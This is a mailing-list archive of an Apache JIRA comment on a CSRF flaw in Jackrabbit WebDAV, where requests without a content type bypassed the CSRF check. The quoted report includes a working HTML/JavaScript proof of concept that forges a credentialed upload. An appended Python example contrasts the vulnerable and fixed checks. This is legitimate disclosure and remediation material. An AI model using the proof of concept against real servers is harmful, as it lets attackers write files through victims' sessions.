jackrabbit-dev mailing list archives

From "Julian Reschke (JIRA)" <j...@apache.org>
Subject [jira] [Comment Edited] (JCR-4002) CSRF in Jackrabbit-Webdav using empty content-type
Date Mon, 29 Aug 2016 12:27:20 GMT

    [ https://issues.apache.org/jira/browse/JCR-4002?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=15424812#comment-15424812 ]

Julian Reschke edited comment on JCR-4002 at 8/29/16 12:27 PM:
---------------------------------------------------------------

But that means that code extending from this now will have to the CSRF protection, right?
If this is true, we need (a) to document that and (b) to review the existing code that *does*
extend it (JSOP?), (c) figure out whether code written by third-parties might be affected
as well.


was (Author: reschke):
But that means that code extending from this now will have to the CSRF protection, right?
If this is true, we need (a) to document that and (b) to review the existing code that *does*
extend it (JSOP?).

> CSRF in Jackrabbit-Webdav using empty content-type
> --------------------------------------------------
>
>                 Key: JCR-4002
>                 URL: https://issues.apache.org/jira/browse/JCR-4002
>             Project: Jackrabbit Content Repository
>          Issue Type: Bug
>          Components: jackrabbit-webdav
>    Affects Versions: 2.4.5, 2.6.5, 2.8.2, 2.10.3, 2.12.3, 2.13.1
>            Reporter: Dominique Jäggi
>            Assignee: Dominique Jäggi
>            Priority: Blocker
>              Labels: csrf, security, webdav
>             Fix For: 2.13.2
>
>         Attachments: JCR_4002__CSRF_in_Jackrabbit_Webdav_using_empty_content_type.patch
>
>
> As per [0] the CSRF content-type check does not include a null request content type.
> This can be exploited to create a resource via CSRF like so:
> {code}
> <html>
>   <body>
>     <script>
>       function submitRequest()
>       {
>         var xhr = new XMLHttpRequest();
>         xhr.open("POST", "http://localhost:42427/test/csrf.txt", true);
>         xhr.withCredentials = true;
>         var body = "This file has been uploaded via CSRF.=\r\n";
>         var aBody = new Uint8Array(body.length);
>         for (var i = 0; i < aBody.length; i++)
>           aBody[i] = body.charCodeAt(i); 
>         xhr.send(new Blob([aBody]));
>       }
>     </script>
>     <form action="#">
>       <input type="button" value="Submit request" onclick="submitRequest();" />
>     </form>
>   </body>
> </html>
> {code}
> I will mitigate this particular issue by including a null content type in the list of
> rejected content types.
> [0] https://github.com/cryptomator/cryptomator/issues/319



--
This message was sent by Atlassian JIRA
(v6.3.4#6332)
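As an added, defender-side illustration of the gate the report describes (example code, not Jackrabbit's own CSRFUtil): the pre-fix predicate lets a POST with no Content-Type header through unchecked, while the post-fix predicate treats an absent or empty Content-Type like a form submission and requires a trusted Referer. The trusted host set and the Referer value are constructed.

```python
# Added illustration of the content-type gate described in JCR-4002; this is
# not Jackrabbit's own CSRFUtil code, and the trusted-host list is constructed.
from typing import Callable, Optional, Set
from urllib.parse import urlparse

# Content types a browser may send cross-origin without a CORS preflight, so a
# POST carrying one of them can be forged from any page the victim visits.
FORM_CAPABLE_TYPES = {
    "application/x-www-form-urlencoded",
    "multipart/form-data",
    "text/plain",
}


def media_type(content_type: Optional[str]) -> Optional[str]:
    """Lowercase media type without parameters, or None if the header is absent or empty."""
    if content_type is None:
        return None
    base = content_type.split(";", 1)[0].strip().lower()
    return base or None


def needs_csrf_check_buggy(content_type: Optional[str]) -> bool:
    """Pre-fix gate: a request with no Content-Type never matches, so it is never checked."""
    return media_type(content_type) in FORM_CAPABLE_TYPES


def needs_csrf_check_fixed(content_type: Optional[str]) -> bool:
    """Post-fix gate: absent or empty Content-Type is treated like a form submission."""
    mt = media_type(content_type)
    return mt is None or mt in FORM_CAPABLE_TYPES


def is_allowed(method: str, headers: dict, trusted_hosts: Set[str],
               gate: Callable[[Optional[str]], bool]) -> bool:
    """Reject a form-capable POST unless its Referer host is one we trust."""
    if method.upper() != "POST":
        return True  # only the POST case from the report is modelled here
    if not gate(headers.get("Content-Type")):
        return True
    referer = headers.get("Referer")
    if not referer:
        return False  # form-capable POST with no Referer: fail closed
    return urlparse(referer).hostname in trusted_hosts


# Constructed request shaped like the PoC: an untyped Blob sends no Content-Type header.
POC_HEADERS = {"Referer": "http://attacker.example/csrf.html"}
TRUSTED = {"localhost"}
```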
